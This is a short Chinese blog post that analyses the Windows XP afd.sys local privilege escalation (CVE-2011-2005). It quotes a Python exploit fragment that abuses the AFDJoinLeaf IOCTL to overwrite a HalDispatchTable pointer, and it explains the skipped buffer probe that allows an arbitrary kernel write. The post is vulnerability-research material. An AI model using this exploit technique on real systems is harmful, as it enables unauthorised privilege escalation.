CVE-2011-2005-Microsoft Windows Afd.sys 本地提权漏洞

用户1423082

发布于 2024-12-31 18:33:49

7300

代码可运行

文章被收录于专栏：giantbranch's bloggiantbranch's blog

运行总次数：0

代码可运行

从利用代码到漏洞函数的定位分析

环境

windows Xp IDA 6.8

exp: https://www.exploit-db.com/exploits/18176/

可以看到是对AFDJoinLeaf函数的一个利用

## Trigger Pointer Overwrite 
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL             = 0x000120bb                # AFDJoinLeaf
inputbuffer       = 0x1004
inputbuffer_size  = 0x108
outputbuffer_size = 0x0                       # Bypass Probe for Write
outputbuffer      = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       IOCTL,
                                       inputbuffer,
                                       inputbuffer_size,
                                       outputbuffer,
                                       outputbuffer_size
                                       )

我看win7的afd.sys好像没有AFDJoinLeaf这个函数，后来用xp的了，注意的是IDA7.0看不大函数名，所以还是IDA6.8好了

function窗口搜索AFDJoinLeaf，跟过去

length不为0才会去检测UserBuffer，那么我们就可以有任意地址写入的漏洞了